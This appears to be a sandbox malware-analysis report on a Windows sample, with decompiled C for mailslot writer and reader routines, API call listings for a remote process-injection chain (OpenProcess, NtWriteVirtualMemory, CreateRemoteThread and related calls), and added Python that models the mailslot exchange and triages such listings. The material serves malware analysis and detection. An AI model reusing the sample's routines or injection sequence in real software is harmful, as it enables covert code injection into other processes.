  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			// Mailslot writer thread: opens \\.\mailslot\msl0 for GENERIC_WRITE (0x40000000), retrying
			// every 100 ms while the slot does not exist yet (ERROR_FILE_NOT_FOUND == 2). The buffer
			// produced by E0040171F is sent as 0x1000-byte messages; a WriteFile failure other than
			// ERROR_SEM_TIMEOUT (0x79) aborts, a timeout retries the same chunk. If the final chunk was a
			// full 0x1000 bytes, the last byte is re-sent on its own so the reader sees a short message.
			// The buffer is zeroed (memset) and freed (E00401207) after sending; 0xb (ERROR_BAD_FORMAT)
			// is returned when E0040171F fails.
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			// Mailslot reader thread: creates \\.\mailslot\msl0 with a 0x1000-byte maximum message size
			// and a zero read timeout, so ReadFile fails with ERROR_SEM_TIMEOUT (0x79) whenever nothing
			// is queued and the loop simply sleeps 100 ms and polls again. Each message is appended to a
			// heap buffer grown by 0x1000 via HeapReAlloc on the heap stored at 0x40305c; the loop ends at
			// the first message shorter than 0x1000. On success the buffer pointer and total length are
			// stored at _a4+4 and _a4+8; 8 (ERROR_NOT_ENOUGH_MEMORY) is returned when allocation fails.
			// Note that the decompiler places the mailslot handle in _v16 at creation but reads it from
			// _v20 in ReadFile and CloseHandle; the stack-slot naming is the decompiler's, not a second handle.
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
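The two decompiled routines E004010FB (writer) and E00401033 (reader) pass a buffer between threads through the mailslot \\.\mailslot\msl0. The Python below is an added model of that exchange, not code from the report or from the analysed sample: it reproduces the framing rules visible in the decompilation (0x1000-byte messages, a zero read timeout surfacing as ERROR_SEM_TIMEOUT, the last byte re-sent alone when the payload length is an exact multiple of 0x1000) against an in-memory stand-in for the mailslot, with both sides on separate threads as E00401639 arranges them. The names Mailslot, writer_thread, reader_thread, exchange and expected_receipt are my own, and the 100 ms Sleep is shortened so the model runs quickly. One consequence the model makes visible: for a payload whose length is a multiple of 0x1000 the reader assembles one extra byte, a duplicate of the last one, because the writer's short trailing message is appended like any other.

```python
"""Model of the mailslot hand-off between E004010FB (writer) and E00401033 (reader)."""
import threading
import time
from collections import deque

CHUNK = 0x1000              # max message size given to CreateMailslotA and used by WriteFile
ERROR_SEM_TIMEOUT = 0x79    # what ReadFile reports when the slot is empty (zero read timeout)
POLL_SECONDS = 0.001        # stands in for Sleep(0x64); shortened for the model


class Mailslot:
    """In-memory stand-in for \\\\.\\mailslot\\msl0: a FIFO of datagrams, read with a zero timeout."""

    def __init__(self, max_message=CHUNK):
        self.max_message = max_message
        self._queue = deque()
        self._lock = threading.Lock()

    def write(self, data: bytes) -> int:
        # WriteFile on a mailslot client handle: one call == one message
        if len(data) > self.max_message:
            raise ValueError("message exceeds the slot's maximum message size")
        with self._lock:
            self._queue.append(bytes(data))
        return len(data)

    def read(self):
        # ReadFile with lReadTimeout == 0 returns at once; None models FALSE + ERROR_SEM_TIMEOUT
        with self._lock:
            return self._queue.popleft() if self._queue else None


def writer_thread(slot: Mailslot, payload: bytes) -> int:
    """E004010FB's send loop: CHUNK-sized messages; if the last one was full, re-send its final byte alone."""
    offset, remaining = 0, len(payload)
    while True:                                  # do { ... } while (remaining != 0)
        size = min(remaining, CHUNK)
        written = slot.write(payload[offset:offset + size])
        offset += written
        remaining -= written
        if remaining == 0 and written == CHUNK:  # force a short trailing message
            remaining = 1
            offset -= 1
        time.sleep(POLL_SECONDS)
        if remaining == 0:
            break
    return 0


def reader_thread(slot: Mailslot) -> bytes:
    """E00401033's receive loop: append every message, stop at the first one shorter than CHUNK."""
    buf = bytearray()
    while True:
        msg = slot.read()
        if msg is None:          # ERROR_SEM_TIMEOUT: nothing queued yet; the original sets _v16 = 0x1000
            got = CHUNK          # so that the loop keeps polling
        else:
            buf += msg           # HeapReAlloc growth in the original
            got = len(msg)
        time.sleep(POLL_SECONDS)
        if got != CHUNK:
            break
    return bytes(buf)


def exchange(payload: bytes) -> bytes:
    """Run both sides on separate threads, as E00401639 does, and return what the reader assembled."""
    slot = Mailslot()
    result = {}
    rt = threading.Thread(target=lambda: result.__setitem__("data", reader_thread(slot)))
    rt.start()
    writer_thread(slot, payload)
    rt.join()
    return result["data"]


def expected_receipt(payload: bytes) -> bytes:
    """What the reader ends up with: the payload, plus a duplicate last byte when len % CHUNK == 0."""
    if payload and len(payload) % CHUNK == 0:
        return payload + payload[-1:]
    return payload
```

Whether the consumer E00401593 trims that extra byte cannot be told from the listing above; the model only shows what the reader thread returns. The write-side retry on ERROR_SEM_TIMEOUT is not modelled because the in-memory slot never refuses a message.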
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
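The entries above for the ResumeThread/SuspendThread, NtWriteVirtualMemory and OpenProcess/CreateRemoteThread routines list the primitives of a remote code injection in the report's "APIs" format. The Python below is an added example of triaging such listings offline; it is not part of the Joe Sandbox report or its tooling. It parses bullet lines in that format, groups the calls into open/write/protect/execute/thread-control stages, decodes the OpenProcess access mask (0x1F0FFF is PROCESS_ALL_ACCESS as defined for pre-Vista targets) and flags the mailslot path. SAMPLE is a constructed input made of lines copied from this report; the regular expression, the stage table and the function names are my own.

```python
import re
from collections import defaultdict

# Matches one call line as printed in the report's "APIs" lists, for example:
#   • NtWriteVirtualMemory.NTDLL(?,00000004,...), ref: 01B33E45
#   • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(...), ref: 01B31A4D
#   • lstrlenW.KERNEL32 ref: 01B32ECC          (no argument list)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Stages of the suspend/write/protect/resume style of injection seen in this report.
INJECTION_STAGES = {
    "open":    {"OpenProcess", "NtOpenProcess"},
    "write":   {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "protect": {"VirtualProtectEx", "NtProtectVirtualMemory"},
    "execute": {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
                "QueueUserAPC", "SetThreadContext", "NtUnmapViewOfSection"},
    "thread":  {"SuspendThread", "ResumeThread"},
}
MAILSLOT_APIS = {"CreateMailslotA", "CreateMailslotW"}
MAILSLOT_PREFIX = "\\\\.\\mailslot\\"
PROCESS_ACCESS = {0x1F0FFF: "PROCESS_ALL_ACCESS", 0x400: "PROCESS_QUERY_INFORMATION"}

# Constructed input: lines copied verbatim from the report entries above.
SAMPLE = r"""
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • lstrlenW.KERNEL32 ref: 01B32ECC
"""


def parse_api_lines(text):
    """Turn the report's bullet lines into dicts; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append({
            "api": m["api"], "module": m["module"], "args": args,
            "ref": int(m["ref"], 16),
            "callee": int(m["callee"], 16) if m["callee"] else None,  # set on "Part of subcall" lines
        })
    return calls


def hex_arg(args, index):
    """Return argument `index` as an int, or None when it is '?' or absent."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def triage(text):
    """Summarise which injection stages and IPC indicators the listed calls cover."""
    calls = parse_api_lines(text)
    stages = defaultdict(set)
    findings = {"mailslot": set(), "process_access": []}
    for c in calls:
        for stage, apis in INJECTION_STAGES.items():
            if c["api"] in apis:
                stages[stage].add(c["api"])
        if c["args"] and (c["api"] in MAILSLOT_APIS
                          or (c["api"].startswith("CreateFile")
                              and c["args"][0].lower().startswith(MAILSLOT_PREFIX))):
            findings["mailslot"].add(c["args"][0])
        if c["api"] in INJECTION_STAGES["open"]:
            mask = hex_arg(c["args"], 0)
            findings["process_access"].append(
                PROCESS_ACCESS.get(mask, hex(mask) if mask is not None else "?"))
    findings["stages"] = {k: sorted(v) for k, v in stages.items()}
    findings["remote_code_injection"] = all(s in stages for s in ("open", "write", "execute"))
    findings["calls"] = len(calls)
    return findings
```

The stage table is deliberately broader than what this report shows (WriteProcessMemory, QueueUserAPC, SetThreadContext) so the same script triages other reports; the "Part of subcall" prefix is kept as `callee` because those lines belong to a different function than the entry they appear under, which matters when counting how many routines touch a remote process.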
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
